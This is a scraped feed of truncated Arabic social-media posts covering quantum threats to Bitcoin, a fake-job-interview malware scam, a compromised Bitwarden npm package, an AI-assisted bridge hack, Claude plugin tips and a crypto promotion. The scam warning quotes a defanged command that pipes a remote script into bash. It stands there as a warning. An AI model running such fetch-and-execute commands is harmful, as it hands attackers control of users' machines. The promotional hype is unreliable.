TheSmartApe🔥

تخبرني أن قبل 7 أشهر، حاسوب كمومي اخترق مفتاح منحنى إيلليبتك مكون من 6 بت.
الأسبوع الماضي، اخترق باحث مفتاح 15 بت. وبيتكوين يستخدم 256؟
كل محفظة بيتكوين محمية بواسطة ECDSA، خوارزمية التوقيع الرقمي لمنحنى إيلليبتك.
مفتاحك الخاص هو المفتاح الوحيد لعملاتك. مفتاحك العام هو رقم تسلسلي للقفل، مرئي للجميع.
من المفتاح العام، لا يمكنك استنتاج المفتاح الخاص. هذا ما يحفظ بيتكوين الخاص بك.
الكمبيوترات الكمومية تكسر ذلك. خوارزمية شور، التي تُشغل على أجهزة كمومية، يمكنها حساب المفتاح الخاص من المفتاح العام. لقد تم إثبات ذلك.
السؤال المفتوح الوحيد هو مدى حجم المفتاح الذي يمكن اختراقه.
> سبتمبر

كن حذرًا من المقابلات الوظيفية المزيفة. فهي الآن واحدة من أنظف طرق توصيل البرمجيات الخبيثة.
كاد أخي أن يتعرض لها هذا الأسبوع.
الخطوة خطوة:
> "موظف توظيف" يراسله على لينكدإن
> لقد قرأوا سيرته الذاتية فعلاً. يعرفون تقنيته. يحجزون موعد مقابلة حقيقية.
> قبل المكالمة بعدة ساعات: "هل يمكنك مراجعة صفحة منتجنا بسرعة قبل أن نتحدث؟"
> عند زيارة الموقع، يتم تشغيل هذا في الخلفية:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
إذا كتبت كلمة المرور الخاصة بك عندما يطلبها، فالأمر انتهى.
بحث (Darksp33d على Github) عن الملف التنفيذي:
> كل سلسلة تكوين مشفرة باستخدام 570 وظيفة مخصصة فريدة
> بمجرد فكها:

لقد فات الجميع هذا الأمر. قبل بضعة أيام، تم اختراق أداة سطر الأوامر bitwarden (واحدة من أكبر مديري كلمات المرور) على npm.
ظل متاحًا لمدة 93 دقيقة. قام 334 مطورًا بتثبيته قبل أن يلاحظ أحد ذلك.
كيف حدث ذلك:
> قام المهاجمون باختطاف حساب مهندس فيتوردن على جت هاب
> دفعوا نسخة خبيثة من حزمة npm (@bitwarden/cli@2026.4.0).
> أي شخص قام بتشغيل npm install bitwarden/cli خلال تلك الفترة قام بتنزيل الباب الخلفي.
لم يرسل سكريبت التثبيت البرمجية الخبيثة مباشرة. بل قام بتنزيل بيئة bun من نقطة إصدار رسمية على جت هاب، لذلك بدا حركة المرور على الشبكة شرعية 100%. ثم نفذ bun الحمولة الحقيقية، bw1.js.
ما تم سرقته:

تقول إيران إن بعض المعدات أعيد تشغيلها خلال الحرب بينما كانت مقطوعة عن الشبكة العالمية.
الفرضية: وجود باب خلفي في البرنامج الثابت أو محمل الإقلاع، يتم تفعيله بواسطة الأقمار الصناعية.
كيف يمكن أن يعمل ذلك:
> رمز مدمج أسفل نظام التشغيل، في البرنامج الثابت أو محمل الإقلاع
> يبقى خاملاً. غير مرئي لأدوات المراقبة القياسية.
> يستمع لمحفز: مؤقت، حزمة غير صحيحة، أو إشارة خارج القناة
> عند التفعيل، ينفذ حمولة محملة مسبقًا
> يعيد التشغيل يمحو معظم الأدلة
في هذه المرحلة، يصبح التحقق مستحيلاً، لكن من الجيد أن تضع ذلك في الاعتبار.

🚨 عاجل: استخدم شخص ما الذكاء الاصطناعي لاختراق @hyperbridge والمغادرة بمبلغ 237 ألف دولار.
المهاجم استخدم الذكاء الاصطناعي لصياغة رسالة مزيفة بدت شرعية للجسر. مثل رسالة مزورة تمامًا تقول "أنا المدير الجديد الآن." وصدقها الجسر.
بمجرد أن "تمت ترقيته" إلى مسؤول، قام المهاجم بعمل إصدار 1 مليار من رموز $DOT من لا شيء على إيثريوم، وبيعها مقابل $237K قبل أن يلاحظ أحد.
→ الذكاء الاصطناعي يولد رسالة عبور سلاسل مزورة
→ تمر الرسالة عبر بوابة hyperbridge
→ يعتقد الجسر أنها حقيقية، ينفذها
→ يصبح المهاجم مسؤولًا عن عقد الرمز
→ يصدر 1 مليار رمز
→ يبيع كل شيء
→ اختفى
كان صياغة رسالة عبو

إذا لم تكن قد قمت بتثبيت هذه الإضافات العشرة لClaude، فلا تقل لي أنك تستخدم Claude بكفاءة.
Claude بدون إضافات = دماغ بلا أذرع.
𝟭. feature-dev
وصف ميزة → يقوم Claude بتنفيذ دورة تطوير كاملة: المتطلبات، الهندسة المعمارية، الكود، الاختبارات، المراجعة، الوثائق. ليس مولد مقتطفات الكود. مهندس مبتدئ.
→ npx skills add anthropic/feature-dev
𝟮. frontend-design
يوقف Claude عن كتابة واجهات مستخدم "تشبه الذكاء الاصطناعي" بشكل عام. يمنحه غريزة تصميم حقيقية، تخطيطات غير متماثلة، طباعة مقصودة، حركات تمرير.
→ npx skills add anthropic/frontend-design
𝟯. context7
بيانات تدريب Claude قديمة منذ شهور. fetches co

تم حل مشكلة ذاكرة الوكيل للتو. إنه مجاني وسهل الاستخدام.
المشروع يُسمى mempalace.
الفكرة بسيطة:
معظم أنظمة الذاكرة تحاول تحديد ما يهم، تلخصه، وتخزن فقط ذلك.
ما يفعله mempalace:
يخزن كل شيء، ثم يجعله قابلاً للبحث.
بدلاً من استخراج أشياء مثل:
• "المستخدم يفضل postgres"
• "المشروع يستخدم graphql"
ورمي المحادثة التي حدثت فيها عملية التفكير الفعلية،
يحتفظ بالمحادثات الأصلية كما هي ويستخدم البحث الدلالي لاسترجاع الذاكرة الصحيحة لاحقًا.
لذا، تحتفظ بالسبب، وليس فقط الملخص.
كيف يعمل:
> كل شيء يبقى محليًا
> يخزن بياناتك في ChromaDB
> ينظم الذاكرة في هيكل يُسمى "قصر"
> ثم يمكن لوكيلك البحث في تلك الذاكرة

إليك كيفية إنشاء ملف طلبات ذاتية التحسين مع مرور الوقت ويساعدك على توليد تطبيقات ويب أكثر احترافية.
1. قم بتوصيل كلاود ببرنامج Playwright MCP الخاص بك
2. قم بتخزين قواعد توليد المكونات الخاصة بك في ملف واحد
مثال: src/lib/prompts/generation.tsx
3. اطلب من كلاود أن:
• يفتح localhost
• يولد مكونًا
• يراجع المخرجات البصرية الفعلية
• يحدث ملف الطلبات
• يعيد التوليد ويقارن
مثال على الطلب:
"انتقل إلى localhost[:]3000، وولّد مكونًا أساسيًا، راجع التصميم، وقم بتحديث src/lib/prompts/generation.tsx لإنتاج مكونات أفضل في المستقبل"
بدلاً من تكرار أنماط عامة مثل:
• تدرجات اللون البنفسجي والأزرق
•

كيفية الحصول على تصميم موقع احترافي دون إعطاء وكيلك 1000 تعليمات تصميم؟
كل ما تحتاجه هو مستودع واحد على GitHub: awesome-design-md.
بدلاً من محاولة وصف نمط بصري كامل في كل مرة، تمنح الوكيل ملف DESIGN[.]md.
بنفس الطريقة التي يخبرك بها ملف AGENTS[.]md بكيفية البناء، يخبرك ملف DESIGN[.]md بكيفية ظهور المنتج.
هذا المستودع هو في الأساس مكتبة منسقة من ملفات DESIGN[.]md المستخرجة من مواقع ويب تركز على المطورين.
كيفية استخدامه بشكل عملي:
1. انتقل إلى المستودع
2. اختر نمطًا يعجبك
3. انسخ ملف DESIGN[.]md الخاص بالموقع إلى جذر مشروعك
4. اطلب من وكيل البرمجة الخاص بك البناء باستخدام ذلك الملف
5. إذا لزم ال

واحد من أكثر مشاريع كود كلاود عملية التي رأيتها.
يحول كلاود إلى نظام تشغيل كامل للبحث عن الوظائف:
> تقييم عروض العمل
> تخصيص سيرتك الذاتية لكل وظيفة
> مسح البوابات
> معالجة الطلبات دفعة واحدة
> تتبع كل شيء في خط أنابيب واحد
كيفية استخدامه بشكل عملي:
1. استنساخ المستودع + تثبيت الاعتمادات
2. إضافة إعداد ملفك الشخصي
3. وضع سيرتك الذاتية في cv[.]md
4. فتح كود كلاود في المستودع
5. لصق رابط وظيفة أو وصف وظيفة
6. تشغيل الخط الكامل: التقييم، السيرة الذاتية المخصصة، تحديث المتتبع
تذكير جيد أن بعض من أفضل منتجات الذكاء الاصطناعي الآن هي فقط:
سير عمل منظم حول قرارات عالية الاحتكاك.

المشكلة الرئيسية الآن مع dispatch + cowork: لا يمكنك تشغيل محادثات متعددة بالتوازي لمشاريع مختلفة.
يُجيد cowork التعامل مع الجلسات في الخلفية، لكن كمستخدم أنت عالق في thread واحد.
إذا كنت أعمل على خط أنابيب المحتوى الخاص بي وأريد في الوقت نفسه التكرار على روبوت تداول، فأنا أحتاج إلى محادثات منفصلة بسياق منفصل.
ليس كل شيء يتم توجيهه عبر thread dispatch واحدة.
يجب على anthropic إضافة per-project threads. يحصل كل مجلد مشروع على محادثته الخاصة، وذاكرته الخاصة، وسياقه الخاص.
لن يكون الأمر صعبًا، فالبنية التحتية موجودة بالفعل مع المشاريع واختيار المجلدات. ما يحتاجه فقط هو تصميم تجربة مستخدم متعددة ا

نقلت بنية openclaw بالكامل إلى cowork + dispatch.
إليك التعليمات لإعطاء dispatch لنقل كل مجلد openclaw:
"لدي مجلد مشروع في [path]. اقرأ جميع الملفات فيه، السياق، الذاكرة، التعليمات، كل شيء. ثم أنشئ ملف تعليمات واحد في ~/Documents/[اسم المشروع]/ يدمج كل ما هو ذو صلة في ملف نظيف يمكنني استخدامه مع Cowork. احتفظ فقط بما يتعلق مباشرة بهدف المشروع، وتجاهل أي شيء غير ذي صلة."
مجلد واحد = ملف تعليمات واحد. عند فتح cowork بهذا المجلد، يكون لديه كل السياق.

كما تعلم أنا أملك أموال ذكية على @Tok_Edge، ما هو تقييمك؟
أبحث عن من يقف وراء هذا الشيء. نحن نتحدث عن اقتصادي من أكسفورد، شريك مدير في $10bn صندوق، 8 سنوات في العملات الرقمية.
هؤلاء ليسوا من المتحمسين العشوائيين الذين جمعوا جولة تمويل أولية من عرض تقديمي. لقد أديروا رأس مال حقيقي. سأدعك تبحث في الباقي بنفسك. بالمناسبة، هم يعرفون تمامًا من هو المال الذكي الحقيقي.
كما قمت بتشغيل مجموعة من المحافظ من خلاله والتقييم لا يهتم بمدى ضخامة محفظتك. الأمر يتعلق بكيفية تداولك، وليس بكمية ما تملك. لا ميزة للحيتان. محفظة ذات أربعة أرقام يمكن أن تتفوق على محفظة ذات سبعة أرقام إذا كانت التحركات أفضل. هذا نادر